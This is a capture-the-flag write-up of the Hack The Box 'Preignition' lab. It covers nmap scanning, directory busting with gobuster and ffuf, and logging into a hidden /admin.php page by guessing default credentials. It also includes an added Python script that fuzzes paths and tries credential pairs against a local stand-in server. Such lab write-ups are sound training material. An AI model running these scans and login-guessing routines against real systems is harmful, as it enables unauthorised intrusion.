Adhishri Kothiyal

Hack The Box -Preignition Write-up (dir busting)

I will cover the solution steps for the "Preignition" machine, which is part of the 'Starting Point' labs and has a difficulty rating of 'Very Easy'. This is a VIP machine, so you'd need an upgrade from your free plan.


Introduction

Web servers are central to most infrastructures, often public-facing and accessible from the Internet. They typically host applications like WordPress, which provides both a public-facing site and a private admin panel (/wp-admin) for managing content, themes, and scripts. While these panels are login-protected, outdated components or misconfigurations can introduce critical vulnerabilities. For pentesters, understanding how these administrative mechanisms work is key, as exploiting them can provide attackers with an initial foothold and a path to pivot deeper into a network.

Thus, web enumeration, specifically directory busting (dir busting), is one of the most essential skills any Penetration Tester must possess. Manually navigating a website and clicking all the available links will reveal some content, but many pages and directories are never linked from the public site, and because nobody is expected to visit them, they often receive less scrutiny and are less well secured. Suppose we did not know that wp-admin is the administrative section of the WordPress site exemplified above. How else would we have found it, if not through web enumeration and directory busting?

Check Hack the Box - Meow on how to connect to the VPN and spawn the machine.

TASK 1: Directory Brute-forcing is a technique used to check a lot of paths on a web server to find hidden pages. Which is another name for this? (i) Local File Inclusion, (ii) dir busting, (iii) hash cracking.

TASK 2: What switch do we use for nmap's scan to specify that we want to perform version detection? -sV

TASK 3: What does Nmap report is the service identified as running on port 80/tcp? http

TASK 4: What server name and version of service is running on port 80/tcp? nginx 1.14.2

TASK 5: What switch do we use to specify to Gobuster we want to perform dir busting specifically? dir

TASK 6: When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages? -x php

TASK 7: What page is found during our dir busting activities? admin.php

TASK 8: What is the HTTP status code reported by Gobuster for the discovered page? 200

Submit Flag:

We start with a preliminary scan of the target using nmap. -sV enables service version detection (Task 2), -A adds OS detection, default scripts and traceroute on top of it, and -Pn skips host discovery so the scan proceeds even if the target ignores ping:

sudo nmap -Pn <$IP> -sV -A
or
sudo nmap <$IP> -sV

From the scan we can see port 80 open. The obvious next step is to open a web browser of our choice and navigate to the target's IP address in the URL bar at the top of the window. The browser will connect to the target's port 80 by default and load the web page's contents, i.e. http://<$IP>:80

The page shows nothing but a mention of nginx, which confirms that the target is a web server. What we are looking at is the default post-installation page for the nginx service, meaning the web application behind it may not be adequately configured yet, or that default credentials are still in place to speed up configuration before live deployment. It also means there are no buttons or links on the page to help us navigate between web directories or other content. When browsing a website, links simply point to other directories or pages; beyond those visible links, web servers may host content that is never linked. Instead of guessing URLs by hand, a technique called directory busting (dir busting) is used to discover such content: a wordlist of likely file and directory names is requested one by one, and the responses whose status code is not 404 are reported. Tools like Gobuster, written in Go, automate this process.

To install gobuster:

sudo apt install golang-go
sudo apt install gobuster

We can use the common.txt wordlist from SecLists, which on Kali is installed at /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt (the original post links a download).

For those who want a more comprehensive grasp of Gobuster's directory hunting mode, invoking the help function for the directory mode is a valuable resource. Simply use the command:

sudo gobuster dir -h

We will be using the -w (wordlist) and -u (target URL) flags.


sudo gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <$IP>

I was unable to get results from gobuster so I decided to use ffuf:

sudo ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://<$IP>/FUZZ.php

The output of our dir busting attempt revealed the page /admin.php, together with its HTTP status code 200. This status code, denoting "OK", is the standard response for a successful HTTP request. I opened the browser and accessed http://target_IP/admin.php. This URL takes us to an admin console login page:

Then I tried a bunch of possible combinations:

  1. {admin:admin}
  2. {admin:password}
  3. {administrator:password}
  4. {admin:password1}
  5. {administrator:password1}

And {admin:admin} worked. Once logged in, the root flag is displayed. Congratulations, you've captured the root flag!
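Both the dir-busting step and the credential-guessing step above are simple enough to reproduce in a few lines. The following Python script is an added example, not part of the original post and not Gobuster's or ffuf's code: it starts a constructed local stand-in for the target (an nginx-style welcome page, a hidden /admin.php that accepts admin:admin, and a constructed flag string) so that it runs offline, busts a constructed slice of a common.txt-style wordlist the way gobuster dir -w ... -x php would, and then tries the five credential pairs listed above against the form. The form field names (username, password) and the stand-in's responses are assumptions; the real box's form may differ. The script also runs the wordlist once without any extension, which is what the gobuster command earlier in this post does because it omits the -x php flag from Task 6: /admin is a 404 on this stand-in, and only /admin.php is found.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

# Constructed stand-in target (not the HTB box): an nginx-style default page,
# a hidden /admin.php login, and a made-up flag returned on admin:admin.
FLAG = "FLAG{constructed-example-not-the-real-flag}"


class Target(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo's output quiet
        pass

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == "/":
            self._send(200, "<h1>Welcome to nginx!</h1>")
        elif self.path == "/admin.php":
            self._send(200, "<form method=post><input name=username>"
                            "<input name=password></form>")
        else:
            self._send(404, "404 Not Found")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        if (self.path == "/admin.php" and form.get("username") == ["admin"]
                and form.get("password") == ["admin"]):
            self._send(200, FLAG)
        else:
            self._send(401, "invalid credentials")


def start_target():
    """Serve the stand-in on an ephemeral localhost port; return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_address[1]}"


def status_of(url, data=None):
    """Return (status, body) for a GET, or for a POST when form data is given."""
    req = Request(url, data=urlencode(data).encode() if data else None)
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:  # urlopen raises on 4xx/5xx; we still want the code
        return err.code, err.read().decode()


def dir_bust(base, words, extensions=(), interesting=(200, 301, 302, 401, 403)):
    """Mimic `gobuster dir -w <list> [-x ext]`: request /word and /word.ext for
    every word and keep the hits whose status is in `interesting`. Both gobuster
    and ffuf leave 404s out of their listing by default; so does this."""
    found = {}
    for word in words:
        for path in [f"/{word}"] + [f"/{word}.{ext}" for ext in extensions]:
            code, _ = status_of(base + path)
            if code in interesting:
                found[path] = code
    return found


def try_logins(url, pairs):
    """POST each (username, password) pair to the form; return the first pair
    that gets a 200 together with the response body (the flag on this box)."""
    for user, pw in pairs:
        code, body = status_of(url, {"username": user, "password": pw})
        if code == 200:
            return (user, pw), body
    return None, None


# Constructed wordlist slice (common.txt has "admin", not "admin.php") and the
# credential pairs tried in the write-up, in the same order.
WORDLIST = ["index", "images", "admin", "login", "backup", "config"]
CREDENTIALS = [("admin", "admin"), ("admin", "password"),
               ("administrator", "password"), ("admin", "password1"),
               ("administrator", "password1")]


def run_demo():
    base = start_target()
    without_ext = dir_bust(base, WORDLIST)                    # no -x: nothing found
    with_ext = dir_bust(base, WORDLIST, extensions=("php",))  # -x php: /admin.php
    creds, body = try_logins(base + "/admin.php", CREDENTIALS)
    return without_ext, with_ext, creds, body


if __name__ == "__main__":
    without_ext, with_ext, creds, body = run_demo()
    print("without -x php:", without_ext)
    for path, code in with_ext.items():
        print(f"{path} (Status: {code})")
    print("login:", creds, "->", body)
```

The stand-in is deliberately single-threaded and sequential; against a real target you would add rate limiting and honour the scope of your engagement, and the status filter in dir_bust is the knob to widen (add 405, 500) when a server answers oddly to unknown paths.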

On submitting it you will receive message as "Preignition has been Pwned".

Credits: The Internet 🛜

> Dear Gentle Reader feel free to reach out for queries and feedback.🥷
